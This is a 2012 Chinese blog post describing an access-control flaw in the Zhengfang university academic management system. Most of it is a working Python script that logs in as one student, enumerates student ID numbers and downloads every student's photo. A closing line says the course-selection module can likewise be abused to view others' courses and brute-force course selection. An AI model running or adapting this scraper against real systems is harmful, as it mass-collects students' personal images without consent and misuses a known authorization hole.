Posted Updated 4 minutes read (About 525 words)

【正方教务管理系统】HACK日志(二)

正方系统的一个漏洞是获取学生图片时没有对学生身份进行检测。理论上来说,获取学生李四的照片,需要首先判断登陆者身份是教师或者学生,如果是学生还要判断登陆者是否为李四本人,而正方系统在这一方面并没有做得很好,导致张三可以轻松地获取李四的照片。

下面是笔者编写的一个简单的爬虫程序,Python 代码如下(Python 3.2),

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
import http.client
import urllib
import os

_xh = '**********'
_pw = '**********'
VIEWSTATE = 'dDwtMTIwMTU3OTE3Nzs7PpxRSEGelcLnTaPgA3v56uoKweD+'
host = 'jwc.****.edu.cn:8989'
main_url = 'http://' + host
login_page = '/default2.aspx'
login_url = main_url + login_page
readimage_page = '/readimagexs.aspx'
print(main_url)
print(login_url)


conn = http.client.HTTPConnection(host)
login_post_data = urllib.parse.urlencode({
    '__VIEWSTATE': VIEWSTATE,
    'TextBox1': _xh,
    'TextBox2': _pw,
    'RadioButtonList1': '学生',
    'Button1': '',
    'lbLanguage': ''
})
login_post_data = login_post_data.encode('utf-8')
login_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'Origin':	main_url,
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': main_url,
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3'
}

conn.request('POST', login_page, body = login_post_data, headers = login_headers)
result = conn.getresponse()
print(result.status)
#print(result.read())
cookie = result.msg['set-cookie'].split(';')[0]
#print(cookie)
conn.close()

readimage_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    'Cookie': cookie
}

conn.request('GET', '/xs_main.aspx' + '?' + 'xh=' + _xh, headers = readimage_headers)
#result = conn.getresponse()
#print(result.status)
#print(result.read())
conn.close()

for year in range(1, 12):#11
    for college in range(1, 20):#19
        for major in range(1, 15):#14
            for mclass in range(1, 10):
                for series in range(1, 50):
                    image_xh = "%02d%02d%02d%02d%02d" % (year, college, major, mclass, series)
                    readimage_url = readimage_page + '?' + 'xh=' + image_xh
                    print(readimage_url)
                    conn.request('GET', readimage_url, headers = readimage_headers)
                    result = conn.getresponse()
                    #print(result.status)
                    image = result.read()
                    if len(image) > 1024:
                        save_path = os.path.join(os.path.abspath('./pic/'), image_xh + '.bmp')
                        print(save_path)
                        fp = open(save_path, 'wb')
                        fp.write(image)
                        fp.close()
                    else:
                        print('skip')
print('done')
conn.close()

后记:正方的选课模块依然有这样的漏洞,因此理论上来说,偷窥别人的课程、暴力选课也照样可以实现。

2012-07-01
By whypro

【正方教务管理系统】HACK日志(二)

http://whypro.github.io/hexo-blog/2012/07/01/f9fdf6fb1cfe/

Author

whypro

Posted on

2012-07-01

Updated on

2022-11-11

Licensed under

#

Comments

Recents

Your browser is out-of-date!

Update your browser to view this website correctly.&npsb;Update my browser now

×

×